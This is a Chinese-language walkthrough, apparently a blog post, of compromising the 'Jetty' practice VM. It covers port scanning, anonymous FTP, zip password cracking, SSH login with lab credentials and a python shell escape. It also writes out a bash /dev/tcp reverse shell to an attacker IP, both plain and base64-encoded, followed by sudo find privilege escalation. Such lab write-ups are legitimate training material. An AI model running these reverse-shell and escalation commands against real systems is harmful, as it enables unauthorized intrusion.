vulhub Jetty

vulhub Jetty

1.主机发现&端口扫描
arp-scan -l
nmap -Pn -p- -sV 192.168.1.8 --min-rate 10000
在这里插入图片描述
2.使用ftp匿名登录获取两个文件

ftp 192.168.1.8
Anonymous
lcd /home/kali/Desktop/jetty #指定下载路径
mget .

在这里插入图片描述

3.打开是一个Readme.txt和passssh.zip,但是需要密码
在这里插入图片描述
4.访问80,目录扫出来的东西不能用
在这里插入图片描述
在这里插入图片描述

5.都是404 Not Find
在这里插入图片描述
6.我怀疑是hosts没有解析对,就把目标转移到了80端口上
在这里插入图片描述

7.就是张图片,MISC一下将其将其下载下来,看了属性也没啥,binwalk也分离不出来什么东西,直接上010,还有就是这张图片不全
在这里插入图片描述
8.89 50 4E 47的文件头不是zip吗?不对。记错了,就是png的文件头
在这里插入图片描述
9.图片名字好特别,kraken.png试试看,是不是这个密码,kraken以及kraken.png都试了,发现不行,改改高度试试
在这里插入图片描述
10.470的十六进制是1D6
在这里插入图片描述
11.600的十六进制是258都没有找到,无语啦,后面试了题目描述中的信息也不对
在这里插入图片描述
在这里插入图片描述
12.对压缩包进行爆破
在这里插入图片描述

Fcrackzip
apt-get install fcrackzip
.gz的解压方式
gzip -d /usr/share/worklist/rocket.txt.gz

在这里插入图片描述

爆破压缩密码
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u sshpass.zip
在这里插入图片描述
13.又学到一个新工具fcrackzip,获取到密码:seahorse!
使用ssh进行连接,感觉用户名没找对(Squiddie)

在这里插入图片描述

14.试试看README.txt的文件名,还是不对
在这里插入图片描述
15.无语啦,呜呜呜呜呜,还是去看一下writeup,看了writeup后我就更傻逼啦,解压得到的是文件啊,大兄弟,这个才是密码:Squ1d4r3Th3B3$t0fTh3W0rLd
在这里插入图片描述

16.一个大小写用户名,差点整的自信心都快没了

用户名:ssh squiddie@192.168.1.8 -p65507
密 码:Squ1d4r3Th3B3$t0fTh3W0rLd

在这里插入图片描述

17.根据题目提示就是提权,反弹个shell试试
bash -i >& /dev/tcp/192.168.1.7/8944 0>&1
Base64编码:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuNy84OTQ0IDA+JjE=|base64 -d|bash -I
加工一下
bash -c {echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuNy84OTQ0IDA+JjE=}|{base64 -d}|{bash -i}
在这里插入图片描述
18.bash反弹shell不行,根据提示整了个问号,发现可以执行python,那就尝试使用python提权,直接使用是不行的
python -c "import pty;pty.spawn('/bin/bash')"
会被限制推出,直接上python

python
中途还是走了少许的弯路
import pty
pty.spawn("/bin/bash")

在这里插入图片描述

19.使用bash64编码反弹shell还不行,直接使用即可,成功反弹shell
bash -i >& /dev/tcp/192.168.1.7/8944 0>&1
nc -lvvp 8944
在这里插入图片描述
20.查看其linux的版本
uname -a
在这里插入图片描述

21.判断出来Linux的内核版本,找了半天还是不行,直接工具扫吧
https://github.com/carlospolop/PEASS-ng/releases/tag/20230219
在这里插入图片描述

在这里插入图片描述

22.尝试使用CVE-2022-2588进行提权
https://github.com/Markakd/CVE-2022-2588
在这里插入图片描述

23.赋予执行权限后直接上强度,但是很遗憾,没有成功,半天没有反应
在这里插入图片描述
24.尝试使用sudo -l进行提权

在这里插入图片描述

25.出现了find,尝试find提权

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

26.使用find提权成功获取root权限
在这里插入图片描述

27.方法二:使用writeup中的办法提权

sudo -l
sudo /usr/bin/find -exec /bin/sh ; -quit
python3 -c “import pty;pty.spawn(‘/bin/bash’)”

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值